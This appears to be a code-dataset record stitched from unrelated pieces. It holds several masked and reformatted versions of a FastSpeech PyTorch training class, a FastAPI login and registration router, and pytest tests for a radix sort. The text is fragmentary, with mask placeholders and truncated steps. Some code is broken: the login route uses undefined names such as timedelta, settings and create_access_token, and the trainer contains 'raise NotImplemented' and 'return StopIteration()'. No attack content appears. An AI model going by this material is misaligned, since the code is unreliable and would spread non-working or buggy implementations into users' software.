{}. Load skipped.'.format(self.ckpt_path)\n )\n\n def console_log(self, tag, loss, meta):\n msg = 'loss: {:.6f}'.format(loss)\n for key, value in meta.items():\n msg += ',\\t{}: {:.4f}'.format(key, value)\n tprint(msg)\n\n def tensorboard_log(self, tag, loss):\n self.tbwriter.add_scalar('{}/loss'.format(tag), loss, global_step=\n self.step)\n\n @staticmethod\n def repeat(iterable, n_repeat=None):\n cnt = 0\n while n_repeat is None or cnt < n_repeat:\n for x in iterable:\n yield x\n cnt += 1\n return StopIteration()\n",
"step-3": "<mask token>\nplt.switch_backend('Agg')\n\n\nclass Trainer(object):\n \"\"\"\n set seed\n set n_epochs, n_steps\n save/load model\n validation\n logging\n distributed\n \"\"\"\n\n def __init__(self, data_loader, model_name, model, optimizer_fn,\n final_steps, lr_scheduler_fn=None, step=0, ckpt_path=None, log_path\n =None, n_epochs=None, save_steps=None, log_steps=10, device='cuda',\n use_amp=False, nvprof_iter_start=None, nvprof_iter_end=None,\n pyprof_enabled=False, detect_anomaly=False, seed=None):\n self.data_loader = data_loader\n self.model_name = model_name\n self.model = model\n self.n_epochs = n_epochs\n self.save_steps = save_steps\n self.log_steps = log_steps\n self.ckpt_path = ckpt_path\n self.log_path = log_path\n self.final_steps = final_steps\n self.step = step\n self.device = device\n self.use_amp = use_amp\n self.nvprof_iter_start = nvprof_iter_start\n self.nvprof_iter_end = nvprof_iter_end\n self.pyprof_enabled = pyprof_enabled\n self.detect_anomaly = detect_anomaly\n self.model.train()\n to_device_async(self.model, self.device)\n num_param = sum(param.numel() for param in model.parameters())\n tprint('The number of {} parameters: {}'.format(self.model_name,\n num_param))\n self.optimizer = optimizer_fn(model)\n if lr_scheduler_fn:\n self.lr_scheduler = lr_scheduler_fn(self.optimizer)\n else:\n self.lr_scheduler = None\n if self.use_amp:\n from apex import amp\n self.model, self.optimizer = amp.initialize(self.model, self.\n optimizer, opt_level='O1')\n if (nvprof_iter_start and nvprof_iter_end is not None and\n pyprof_enabled):\n from apex import pyprof\n pyprof.nvtx.init()\n self.model = nn.DataParallel(self.model)\n if seed is None:\n seed = np.random.randint(2 ** 16)\n np.random.seed(seed)\n torch.manual_seed(seed)\n self.data_loader_iter = self.repeat(self.data_loader, n_epochs)\n if log_path:\n log_path = os.path.join(log_path, time.strftime('%Y%m%d-%H%M%S'))\n self.tbwriter = SummaryWriter(log_dir=log_path, flush_secs=10)\n if self.ckpt_path:\n self.ckpt_path = os.path.join(self.ckpt_path, self.model_name)\n pathlib.Path(self.ckpt_path).mkdir(parents=True, exist_ok=True)\n self.load()\n\n def train(self):\n try:\n with torch.autograd.profiler.emit_nvtx(enabled=self.pyprof_enabled\n ):\n for i in range(self.step + 1, self.final_steps + 1):\n self.step = i\n tprint('------------- TRAIN step : {} -------------'.\n format(i))\n if self.nvprof_iter_start and i == self.nvprof_iter_start:\n profiler.start()\n timer = TimeElapsed(name=\n 'Training time during profiling', format=':.6f')\n timer.start()\n with Nvtx('step #{}'.format(self.step)):\n loss, meta = self.do_step()\n if self.nvprof_iter_end and i == self.nvprof_iter_end:\n profiler.stop()\n timer.end()\n if self.lr_scheduler:\n for param_group in self.optimizer.param_groups:\n tprint('lr: {:06f}'.format(param_group['lr']))\n self.lr_scheduler.step(self.step)\n if self.step % self.log_steps == 0:\n self.log(loss, meta)\n if (self.ckpt_path and self.save_steps and i % self.\n save_steps == 0):\n self.save()\n tprint('Training has been done.')\n except StopIteration:\n tprint('Training has been done. (by n_epochs)')\n except KeyboardInterrupt:\n tprint('Training has been canceled.')\n\n @abc.abstractmethod\n def loss(self, inputs, model):\n raise NotImplemented\n\n def do_step(self):\n with Nvtx('data load', enabled=False):\n data = next(self.data_loader_iter)\n with torch.autograd.set_detect_anomaly(mode=self.detect_anomaly):\n with Nvtx('forward'):\n loss, meta = self.loss(data, self.model)\n self.optimizer.zero_grad()\n with Nvtx('backward'):\n if self.use_amp:\n from apex import amp\n with amp.scale_loss(loss, self.optimizer) as scaled_loss:\n scaled_loss.backward()\n else:\n loss.backward()\n with Nvtx('weight update'):\n self.optimizer.step()\n return loss, meta\n\n def log(self, loss, meta):\n self.console_log('train', loss, meta)\n if self.log_path:\n self.tensorboard_log('train', loss)\n\n def save(self):\n state_dict = {'step': self.step, 'model': self.model.state_dict(),\n 'optim': self.optimizer.state_dict()}\n torch.save(state_dict, self.ckpt_path + '/checkpoint_{:06d}.pt'.\n format(self.step))\n tprint('[Save] Model \"{}\". Step={}.'.format(self.model_name, self.step)\n )\n\n def load(self, load_optim=True):\n files_exist = glob.glob(os.path.join(self.ckpt_path, '*'))\n if files_exist:\n latest_file = max(files_exist, key=os.path.getctime)\n state_dict = torch.load(latest_file)\n self.step = state_dict['step']\n self.model.load_state_dict(state_dict['model'])\n if load_optim:\n self.optimizer.load_state_dict(state_dict['optim'])\n tprint(\"[Load] Checkpoint '{}'. Step={}\".format(latest_file,\n self.step))\n else:\n tprint('No checkpoints in {}. Load skipped.'.format(self.ckpt_path)\n )\n\n def console_log(self, tag, loss, meta):\n msg = 'loss: {:.6f}'.format(loss)\n for key, value in meta.items():\n msg += ',\\t{}: {:.4f}'.format(key, value)\n tprint(msg)\n\n def tensorboard_log(self, tag, loss):\n self.tbwriter.add_scalar('{}/loss'.format(tag), loss, global_step=\n self.step)\n\n @staticmethod\n def repeat(iterable, n_repeat=None):\n cnt = 0\n while n_repeat is None or cnt < n_repeat:\n for x in iterable:\n yield x\n cnt += 1\n return StopIteration()\n",
"step-4": "import abc\nimport glob\nimport pathlib\nimport numpy as np\nimport torch\nfrom tensorboardX import SummaryWriter\nimport time\nimport os\nimport matplotlib.pyplot as plt\nfrom torch import nn\nfrom fastspeech.utils.logging import tprint\nfrom fastspeech.utils.pytorch import to_device_async\nfrom fastspeech.utils.nvtx import Nvtx\nfrom fastspeech.utils.fp16 import cast_model_to_half\nimport torch.cuda.profiler as profiler\nfrom fastspeech.utils.logging import tprint\nfrom fastspeech.utils.time import TimeElapsed\nplt.switch_backend('Agg')\n\n\nclass Trainer(object):\n \"\"\"\n set seed\n set n_epochs, n_steps\n save/load model\n validation\n logging\n distributed\n \"\"\"\n\n def __init__(self, data_loader, model_name, model, optimizer_fn,\n final_steps, lr_scheduler_fn=None, step=0, ckpt_path=None, log_path\n =None, n_epochs=None, save_steps=None, log_steps=10, device='cuda',\n use_amp=False, nvprof_iter_start=None, nvprof_iter_end=None,\n pyprof_enabled=False, detect_anomaly=False, seed=None):\n self.data_loader = data_loader\n self.model_name = model_name\n self.model = model\n self.n_epochs = n_epochs\n self.save_steps = save_steps\n self.log_steps = log_steps\n self.ckpt_path = ckpt_path\n self.log_path = log_path\n self.final_steps = final_steps\n self.step = step\n self.device = device\n self.use_amp = use_amp\n self.nvprof_iter_start = nvprof_iter_start\n self.nvprof_iter_end = nvprof_iter_end\n self.pyprof_enabled = pyprof_enabled\n self.detect_anomaly = detect_anomaly\n self.model.train()\n to_device_async(self.model, self.device)\n num_param = sum(param.numel() for param in model.parameters())\n tprint('The number of {} parameters: {}'.format(self.model_name,\n num_param))\n self.optimizer = optimizer_fn(model)\n if lr_scheduler_fn:\n self.lr_scheduler = lr_scheduler_fn(self.optimizer)\n else:\n self.lr_scheduler = None\n if self.use_amp:\n from apex import amp\n self.model, self.optimizer = amp.initialize(self.model, self.\n optimizer, opt_level='O1')\n if (nvprof_iter_start and nvprof_iter_end is not None and\n pyprof_enabled):\n from apex import pyprof\n pyprof.nvtx.init()\n self.model = nn.DataParallel(self.model)\n if seed is None:\n seed = np.random.randint(2 ** 16)\n np.random.seed(seed)\n torch.manual_seed(seed)\n self.data_loader_iter = self.repeat(self.data_loader, n_epochs)\n if log_path:\n log_path = os.path.join(log_path, time.strftime('%Y%m%d-%H%M%S'))\n self.tbwriter = SummaryWriter(log_dir=log_path, flush_secs=10)\n if self.ckpt_path:\n self.ckpt_path = os.path.join(self.ckpt_path, self.model_name)\n pathlib.Path(self.ckpt_path).mkdir(parents=True, exist_ok=True)\n self.load()\n\n def train(self):\n try:\n with torch.autograd.profiler.emit_nvtx(enabled=self.pyprof_enabled\n ):\n for i in range(self.step + 1, self.final_steps + 1):\n self.step = i\n tprint('------------- TRAIN step : {} -------------'.\n format(i))\n if self.nvprof_iter_start and i == self.nvprof_iter_start:\n profiler.start()\n timer = TimeElapsed(name=\n 'Training time during profiling', format=':.6f')\n timer.start()\n with Nvtx('step #{}'.format(self.step)):\n loss, meta = self.do_step()\n if self.nvprof_iter_end and i == self.nvprof_iter_end:\n profiler.stop()\n timer.end()\n if self.lr_scheduler:\n for param_group in self.optimizer.param_groups:\n tprint('lr: {:06f}'.format(param_group['lr']))\n self.lr_scheduler.step(self.step)\n if self.step % self.log_steps == 0:\n self.log(loss, meta)\n if (self.ckpt_path and self.save_steps and i % self.\n save_steps == 0):\n self.save()\n tprint('Training has been done.')\n except StopIteration:\n tprint('Training has been done. (by n_epochs)')\n except KeyboardInterrupt:\n tprint('Training has been canceled.')\n\n @abc.abstractmethod\n def loss(self, inputs, model):\n raise NotImplemented\n\n def do_step(self):\n with Nvtx('data load', enabled=False):\n data = next(self.data_loader_iter)\n with torch.autograd.set_detect_anomaly(mode=self.detect_anomaly):\n with Nvtx('forward'):\n loss, meta = self.loss(data, self.model)\n self.optimizer.zero_grad()\n with Nvtx('backward'):\n if self.use_amp:\n from apex import amp\n with amp.scale_loss(loss, self.optimizer) as scaled_loss:\n scaled_loss.backward()\n else:\n loss.backward()\n with Nvtx('weight update'):\n self.optimizer.step()\n return loss, meta\n\n def log(self, loss, meta):\n self.console_log('train', loss, meta)\n if self.log_path:\n self.tensorboard_log('train', loss)\n\n def save(self):\n state_dict = {'step': self.step, 'model': self.model.state_dict(),\n 'optim': self.optimizer.state_dict()}\n torch.save(state_dict, self.ckpt_path + '/checkpoint_{:06d}.pt'.\n format(self.step))\n tprint('[Save] Model \"{}\". Step={}.'.format(self.model_name, self.step)\n )\n\n def load(self, load_optim=True):\n files_exist = glob.glob(os.path.join(self.ckpt_path, '*'))\n if files_exist:\n latest_file = max(files_exist, key=os.path.getctime)\n state_dict = torch.load(latest_file)\n self.step = state_dict['step']\n self.model.load_state_dict(state_dict['model'])\n if load_optim:\n self.optimizer.load_state_dict(state_dict['optim'])\n tprint(\"[Load] Checkpoint '{}'. Step={}\".format(latest_file,\n self.step))\n else:\n tprint('No checkpoints in {}. Load skipped.'.format(self.ckpt_path)\n )\n\n def console_log(self, tag, loss, meta):\n msg = 'loss: {:.6f}'.format(loss)\n for key, value in meta.items():\n msg += ',\\t{}: {:.4f}'.format(key, value)\n tprint(msg)\n\n def tensorboard_log(self, tag, loss):\n self.tbwriter.add_scalar('{}/loss'.format(tag), loss, global_step=\n self.step)\n\n @staticmethod\n def repeat(iterable, n_repeat=None):\n cnt = 0\n while n_repeat is None or cnt < n_repeat:\n for x in iterable:\n yield x\n cnt += 1\n return StopIteration()\n",
"step-5": "# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.\n\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of the NVIDIA CORPORATION nor the\n# names of its contributors may be used to endorse or promote products\n# derived from this software without specific prior written permission.\n\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL NVIDIA CORPORATION BE LIABLE FOR ANY\n# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nimport abc\nimport glob\nimport pathlib\n\nimport numpy as np\nimport torch\nfrom tensorboardX import SummaryWriter\nimport time\nimport os\nimport matplotlib.pyplot as plt\nfrom torch import nn\n\nfrom fastspeech.utils.logging import tprint\nfrom fastspeech.utils.pytorch import to_device_async\nfrom fastspeech.utils.nvtx import Nvtx\nfrom fastspeech.utils.fp16 import cast_model_to_half\n\nimport torch.cuda.profiler as profiler\nfrom fastspeech.utils.logging import tprint\nfrom fastspeech.utils.time import TimeElapsed\n\nplt.switch_backend('Agg')\n\n\nclass Trainer(object):\n \"\"\"\n set seed\n set n_epochs, n_steps\n save/load model\n validation\n logging\n distributed\n \"\"\"\n\n def __init__(self, data_loader, model_name, model, optimizer_fn, final_steps, lr_scheduler_fn=None, step=0, ckpt_path=None, log_path=None, n_epochs=None, save_steps=None, log_steps=10, device='cuda', use_amp=False, nvprof_iter_start=None, nvprof_iter_end=None, pyprof_enabled=False, detect_anomaly=False, seed=None):\n self.data_loader = data_loader\n self.model_name = model_name\n self.model = model\n self.n_epochs = n_epochs\n self.save_steps = save_steps\n self.log_steps = log_steps\n self.ckpt_path = ckpt_path\n self.log_path = log_path\n self.final_steps = final_steps\n self.step = step\n self.device = device\n self.use_amp = use_amp\n self.nvprof_iter_start = nvprof_iter_start\n self.nvprof_iter_end = nvprof_iter_end\n self.pyprof_enabled = pyprof_enabled\n self.detect_anomaly = detect_anomaly\n\n # model\n self.model.train()\n to_device_async(self.model, self.device)\n num_param = sum(param.numel() for param in model.parameters())\n tprint('The number of {} parameters: {}'.format(\n self.model_name, num_param))\n\n # optimizer\n self.optimizer = optimizer_fn(model)\n\n # lr scheduler\n if lr_scheduler_fn:\n self.lr_scheduler = lr_scheduler_fn(self.optimizer)\n else:\n self.lr_scheduler = None\n\n # automatic mixed precision\n if self.use_amp:\n from apex import amp\n self.model, self.optimizer = amp.initialize(self.model, \n self.optimizer, \n opt_level='O1')\n\n # profile\n if nvprof_iter_start and nvprof_iter_end is not None and pyprof_enabled:\n from apex import pyprof\n pyprof.nvtx.init()\n\n # data parallel\n self.model = nn.DataParallel(self.model)\n\n # set seed\n if seed is None:\n seed = np.random.randint(2**16)\n np.random.seed(seed)\n torch.manual_seed(seed)\n\n # data loader\n self.data_loader_iter = self.repeat(self.data_loader, n_epochs)\n\n # logging\n if log_path:\n # tensorboard log path : {log_path}/YYYYMMDD-HHMMMSS\n log_path = os.path.join(log_path, time.strftime('%Y%m%d-%H%M%S'))\n self.tbwriter = SummaryWriter(log_dir=log_path, flush_secs=10)\n\n # checkpoint path\n if self.ckpt_path:\n self.ckpt_path = os.path.join(self.ckpt_path, self.model_name)\n pathlib.Path(self.ckpt_path).mkdir(parents=True, exist_ok=True)\n\n # load checkpoint\n self.load()\n\n def train(self):\n try:\n with torch.autograd.profiler.emit_nvtx(enabled=self.pyprof_enabled):\n for i in range(self.step+1, self.final_steps + 1):\n self.step = i\n tprint(\"------------- TRAIN step : {} -------------\".format(i))\n\n if self.nvprof_iter_start and i == self.nvprof_iter_start:\n profiler.start()\n timer = TimeElapsed(name=\"Training time during profiling\", format=\":.6f\")\n timer.start()\n\n with Nvtx(\"step #{}\".format(self.step)):\n loss, meta = self.do_step()\n\n if self.nvprof_iter_end and i == self.nvprof_iter_end:\n profiler.stop()\n timer.end()\n \n if self.lr_scheduler:\n for param_group in self.optimizer.param_groups:\n tprint(\"lr: {:06f}\".format(param_group['lr']))\n self.lr_scheduler.step(self.step)\n\n if self.step % self.log_steps == 0:\n self.log(loss, meta)\n\n if self.ckpt_path and self.save_steps and i % self.save_steps == 0:\n self.save()\n\n tprint(\"Training has been done.\")\n except StopIteration: # done by n_epochs\n tprint(\"Training has been done. (by n_epochs)\")\n except KeyboardInterrupt:\n tprint(\"Training has been canceled.\")\n\n @abc.abstractmethod\n def loss(self, inputs, model):\n raise NotImplemented\n\n def do_step(self):\n with Nvtx(\"data load\", enabled=False):\n data = next(self.data_loader_iter)\n\n with torch.autograd.set_detect_anomaly(mode=self.detect_anomaly):\n with Nvtx(\"forward\"):\n loss, meta = self.loss(data, self.model)\n \n self.optimizer.zero_grad()\n\n with Nvtx(\"backward\"):\n if self.use_amp:\n from apex import amp\n with amp.scale_loss(loss, self.optimizer) as scaled_loss:\n scaled_loss.backward()\n else:\n loss.backward()\n\n with Nvtx(\"weight update\"):\n self.optimizer.step()\n\n return loss, meta\n\n def log(self, loss, meta):\n self.console_log('train', loss, meta)\n if self.log_path:\n self.tensorboard_log('train', loss)\n\n def save(self):\n state_dict = {\n 'step': self.step,\n 'model': self.model.state_dict(),\n 'optim': self.optimizer.state_dict(),\n }\n torch.save(state_dict, self.ckpt_path +\n '/checkpoint_{:06d}.pt'.format(self.step))\n\n tprint('[Save] Model \"{}\". Step={}.'.format(\n self.model_name, self.step))\n\n def load(self, load_optim=True):\n files_exist = glob.glob(os.path.join(self.ckpt_path, '*'))\n if files_exist:\n # load the latest created file.\n latest_file = max(files_exist, key=os.path.getctime)\n state_dict = torch.load(latest_file)\n\n self.step = state_dict['step']\n self.model.load_state_dict(state_dict['model'])\n if load_optim:\n self.optimizer.load_state_dict(state_dict['optim'])\n\n tprint('[Load] Checkpoint \\'{}\\'. Step={}'.format(\n latest_file, self.step))\n else:\n tprint('No checkpoints in {}. Load skipped.'.format(self.ckpt_path))\n\n def console_log(self, tag, loss, meta):\n # console logging\n msg = 'loss: {:.6f}'.format(loss)\n for key, value in meta.items():\n msg += ',\\t{}: {:.4f}'.format(key, value)\n tprint(msg)\n\n def tensorboard_log(self, tag, loss):\n self.tbwriter.add_scalar(\n '{}/loss'.format(tag), loss, global_step=self.step)\n\n @staticmethod\n def repeat(iterable, n_repeat=None):\n cnt = 0\n while n_repeat is None or cnt < n_repeat:\n for x in iterable:\n yield x\n cnt += 1\n return StopIteration()\n",
"step-ids": [
8,
12,
13,
14,
15
]
}
|
[
8,
12,
13,
14,
15
] |
import uuid
from fastapi import APIRouter, Depends, HTTPException, Form, Body
from fastapi.security import OAuth2PasswordBearer, OAuth2PasswordRequestForm
from sqlalchemy.orm import Session
# dependency
from configs.config_sqlalchemy import get_db
# schema
from schema import store_schema
# define the url the client will use to access the token
oauth2_scheme = OAuth2PasswordBearer(tokenUrl="auth/login")
# router object
router = APIRouter(
prefix="/auth",
tags=["AUTHORIZATION AND AUTHENTICATION"],
responses={
200:{'description':'Ok'},
201:{'description':'created'},
400: {"description": "Bad Request"},
404: {"description": "Not found"}
}
)
# register a new account
@router.post("/account/register",
summary='register to create a new store',
response_model=store_schema.Store,
status_code=201
)
async def account_register(
StoreName: str = Body(...),
OwnerFirstName: str = Body(...),
OwnerLastName: str = Body(...),
OwnerEmail: str = Body(...),
):
return
# account login
@router.post('/login',
summary='login to get access token',
status_code=200
)
async def login(form_data: OAuth2PasswordRequestForm = Depends(), db:Session=Depends(get_db)):
user = authenticate_user(email=form_data.username, password=form_data.password, db=db)
if not user:
raise HTTPException(
status_code=401,
detail="Incorrect username or password",
headers={"WWW-Authenticate": "Bearer"},
)
access_token_expires = timedelta(minutes=settings.ACCESS_TOKEN_EXPIRE_MINUTES)
access_token = create_access_token(
data={"sub": str(user.id)}, expires_delta=access_token_expires
)
return {"access_token": access_token, "token_type": "bearer", "user":user}
|
normal
|
{
"blob_id": "64bbf2e3b961a6e0b5d7e551278bb21990df2ed9",
"index": 5526,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]('/account/register', summary='register to create a new store',\n response_model=store_schema.Store, status_code=201)\nasync def account_register(StoreName: str=Body(...), OwnerFirstName: str=\n Body(...), OwnerLastName: str=Body(...), OwnerEmail: str=Body(...)):\n return\n\n\[email protected]('/login', summary='login to get access token', status_code=200)\nasync def login(form_data: OAuth2PasswordRequestForm=Depends(), db: Session\n =Depends(get_db)):\n user = authenticate_user(email=form_data.username, password=form_data.\n password, db=db)\n if not user:\n raise HTTPException(status_code=401, detail=\n 'Incorrect username or password', headers={'WWW-Authenticate':\n 'Bearer'})\n access_token_expires = timedelta(minutes=settings.\n ACCESS_TOKEN_EXPIRE_MINUTES)\n access_token = create_access_token(data={'sub': str(user.id)},\n expires_delta=access_token_expires)\n return {'access_token': access_token, 'token_type': 'bearer', 'user': user}\n",
"step-3": "<mask token>\noauth2_scheme = OAuth2PasswordBearer(tokenUrl='auth/login')\nrouter = APIRouter(prefix='/auth', tags=['AUTHORIZATION AND AUTHENTICATION'\n ], responses={(200): {'description': 'Ok'}, (201): {'description':\n 'created'}, (400): {'description': 'Bad Request'}, (404): {\n 'description': 'Not found'}})\n\n\[email protected]('/account/register', summary='register to create a new store',\n response_model=store_schema.Store, status_code=201)\nasync def account_register(StoreName: str=Body(...), OwnerFirstName: str=\n Body(...), OwnerLastName: str=Body(...), OwnerEmail: str=Body(...)):\n return\n\n\[email protected]('/login', summary='login to get access token', status_code=200)\nasync def login(form_data: OAuth2PasswordRequestForm=Depends(), db: Session\n =Depends(get_db)):\n user = authenticate_user(email=form_data.username, password=form_data.\n password, db=db)\n if not user:\n raise HTTPException(status_code=401, detail=\n 'Incorrect username or password', headers={'WWW-Authenticate':\n 'Bearer'})\n access_token_expires = timedelta(minutes=settings.\n ACCESS_TOKEN_EXPIRE_MINUTES)\n access_token = create_access_token(data={'sub': str(user.id)},\n expires_delta=access_token_expires)\n return {'access_token': access_token, 'token_type': 'bearer', 'user': user}\n",
"step-4": "import uuid\nfrom fastapi import APIRouter, Depends, HTTPException, Form, Body\nfrom fastapi.security import OAuth2PasswordBearer, OAuth2PasswordRequestForm\nfrom sqlalchemy.orm import Session\nfrom configs.config_sqlalchemy import get_db\nfrom schema import store_schema\noauth2_scheme = OAuth2PasswordBearer(tokenUrl='auth/login')\nrouter = APIRouter(prefix='/auth', tags=['AUTHORIZATION AND AUTHENTICATION'\n ], responses={(200): {'description': 'Ok'}, (201): {'description':\n 'created'}, (400): {'description': 'Bad Request'}, (404): {\n 'description': 'Not found'}})\n\n\[email protected]('/account/register', summary='register to create a new store',\n response_model=store_schema.Store, status_code=201)\nasync def account_register(StoreName: str=Body(...), OwnerFirstName: str=\n Body(...), OwnerLastName: str=Body(...), OwnerEmail: str=Body(...)):\n return\n\n\[email protected]('/login', summary='login to get access token', status_code=200)\nasync def login(form_data: OAuth2PasswordRequestForm=Depends(), db: Session\n =Depends(get_db)):\n user = authenticate_user(email=form_data.username, password=form_data.\n password, db=db)\n if not user:\n raise HTTPException(status_code=401, detail=\n 'Incorrect username or password', headers={'WWW-Authenticate':\n 'Bearer'})\n access_token_expires = timedelta(minutes=settings.\n ACCESS_TOKEN_EXPIRE_MINUTES)\n access_token = create_access_token(data={'sub': str(user.id)},\n expires_delta=access_token_expires)\n return {'access_token': access_token, 'token_type': 'bearer', 'user': user}\n",
"step-5": "import uuid\n\nfrom fastapi import APIRouter, Depends, HTTPException, Form, Body\nfrom fastapi.security import OAuth2PasswordBearer, OAuth2PasswordRequestForm\nfrom sqlalchemy.orm import Session\n\n# dependency\nfrom configs.config_sqlalchemy import get_db\n# schema\nfrom schema import store_schema \n\n\n\n# define the url the client will use to access the token\noauth2_scheme = OAuth2PasswordBearer(tokenUrl=\"auth/login\")\n\n# router object\nrouter = APIRouter(\n prefix=\"/auth\",\n tags=[\"AUTHORIZATION AND AUTHENTICATION\"],\n responses={\n 200:{'description':'Ok'},\n 201:{'description':'created'},\n 400: {\"description\": \"Bad Request\"},\n 404: {\"description\": \"Not found\"}\n } \n)\n\n# register a new account\[email protected](\"/account/register\",\nsummary='register to create a new store',\nresponse_model=store_schema.Store,\nstatus_code=201\n)\nasync def account_register(\n StoreName: str = Body(...),\n OwnerFirstName: str = Body(...),\n OwnerLastName: str = Body(...),\n OwnerEmail: str = Body(...),\n):\n return\n \n# account login\[email protected]('/login',\nsummary='login to get access token',\nstatus_code=200\n)\nasync def login(form_data: OAuth2PasswordRequestForm = Depends(), db:Session=Depends(get_db)):\n user = authenticate_user(email=form_data.username, password=form_data.password, db=db)\n if not user:\n raise HTTPException(\n status_code=401,\n detail=\"Incorrect username or password\",\n headers={\"WWW-Authenticate\": \"Bearer\"},\n )\n access_token_expires = timedelta(minutes=settings.ACCESS_TOKEN_EXPIRE_MINUTES)\n access_token = create_access_token(\n data={\"sub\": str(user.id)}, expires_delta=access_token_expires\n )\n return {\"access_token\": access_token, \"token_type\": \"bearer\", \"user\":user}\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def test_stringify_nums():
"""."""
from radixsort import stringify_nums
nums = [1, 2, 3, 4, 5]
stringified_nums = stringify_nums(nums)
assert stringified_nums == ['1', '2', '3', '4', '5']
def test_while_condition():
"""."""
from radixsort import while_condition
stringified_nums = ['1', '2', '3', '4', '5000']
assert while_condition(stringified_nums) == 4
<|reserved_special_token_0|>
def test_push_into_buckets():
"""."""
from radixsort import push_into_buckets
buckets_dict = OrderedDict({'none': Queue(), '0': Queue(), '1': Queue(),
'2': Queue(), '3': Queue(), '4': Queue(), '5': Queue(), '6': Queue(
), '7': Queue(), '8': Queue(), '9': Queue()})
nums = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
full_buckets_dict = push_into_buckets(nums, 0, buckets_dict)
for key in full_buckets_dict:
if full_buckets_dict[key].peek():
assert full_buckets_dict[key].dequeue() == key
<|reserved_special_token_0|>
def test_radix_sort_verbose():
"""Test with many lists."""
from radixsort import radixsort
for i in range(100):
list_length = random.randint(0, 100)
unsorted_list = []
for x in range(list_length):
unsorted_list.append(random.randint(0, 100))
assert radixsort(unsorted_list) == sorted(unsorted_list)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def test_stringify_nums():
"""."""
from radixsort import stringify_nums
nums = [1, 2, 3, 4, 5]
stringified_nums = stringify_nums(nums)
assert stringified_nums == ['1', '2', '3', '4', '5']
def test_while_condition():
"""."""
from radixsort import while_condition
stringified_nums = ['1', '2', '3', '4', '5000']
assert while_condition(stringified_nums) == 4
def test_unravel_buckets():
"""."""
from radixsort import unravel_buckets
buckets_dict = OrderedDict({'none': Queue(), '0': Queue(), '1': Queue(),
'2': Queue(), '3': Queue(), '4': Queue(), '5': Queue(), '6': Queue(
), '7': Queue(), '8': Queue(), '9': Queue()})
for bucket in buckets_dict:
buckets_dict[bucket].enqueue(bucket)
assert unravel_buckets(buckets_dict) == ['none', '0', '1', '2', '3',
'4', '5', '6', '7', '8', '9']
def test_push_into_buckets():
"""."""
from radixsort import push_into_buckets
buckets_dict = OrderedDict({'none': Queue(), '0': Queue(), '1': Queue(),
'2': Queue(), '3': Queue(), '4': Queue(), '5': Queue(), '6': Queue(
), '7': Queue(), '8': Queue(), '9': Queue()})
nums = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
full_buckets_dict = push_into_buckets(nums, 0, buckets_dict)
for key in full_buckets_dict:
if full_buckets_dict[key].peek():
assert full_buckets_dict[key].dequeue() == key
<|reserved_special_token_0|>
def test_radix_sort_verbose():
"""Test with many lists."""
from radixsort import radixsort
for i in range(100):
list_length = random.randint(0, 100)
unsorted_list = []
for x in range(list_length):
unsorted_list.append(random.randint(0, 100))
assert radixsort(unsorted_list) == sorted(unsorted_list)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def test_stringify_nums():
"""."""
from radixsort import stringify_nums
nums = [1, 2, 3, 4, 5]
stringified_nums = stringify_nums(nums)
assert stringified_nums == ['1', '2', '3', '4', '5']
def test_while_condition():
"""."""
from radixsort import while_condition
stringified_nums = ['1', '2', '3', '4', '5000']
assert while_condition(stringified_nums) == 4
def test_unravel_buckets():
"""."""
from radixsort import unravel_buckets
buckets_dict = OrderedDict({'none': Queue(), '0': Queue(), '1': Queue(),
'2': Queue(), '3': Queue(), '4': Queue(), '5': Queue(), '6': Queue(
), '7': Queue(), '8': Queue(), '9': Queue()})
for bucket in buckets_dict:
buckets_dict[bucket].enqueue(bucket)
assert unravel_buckets(buckets_dict) == ['none', '0', '1', '2', '3',
'4', '5', '6', '7', '8', '9']
def test_push_into_buckets():
"""."""
from radixsort import push_into_buckets
buckets_dict = OrderedDict({'none': Queue(), '0': Queue(), '1': Queue(),
'2': Queue(), '3': Queue(), '4': Queue(), '5': Queue(), '6': Queue(
), '7': Queue(), '8': Queue(), '9': Queue()})
nums = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
full_buckets_dict = push_into_buckets(nums, 0, buckets_dict)
for key in full_buckets_dict:
if full_buckets_dict[key].peek():
assert full_buckets_dict[key].dequeue() == key
def test_radix_sort():
"""Test with simple list."""
from radixsort import radixsort
nums = [5, 3, 2, 7, 9, 4, 0, 1]
assert radixsort(nums) == [0, 1, 2, 3, 4, 5, 7, 9]
def test_radix_sort_verbose():
"""Test with many lists."""
from radixsort import radixsort
for i in range(100):
list_length = random.randint(0, 100)
unsorted_list = []
for x in range(list_length):
unsorted_list.append(random.randint(0, 100))
assert radixsort(unsorted_list) == sorted(unsorted_list)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import random
from collections import OrderedDict
from que_ import Queue
def test_stringify_nums():
"""."""
from radixsort import stringify_nums
nums = [1, 2, 3, 4, 5]
stringified_nums = stringify_nums(nums)
assert stringified_nums == ['1', '2', '3', '4', '5']
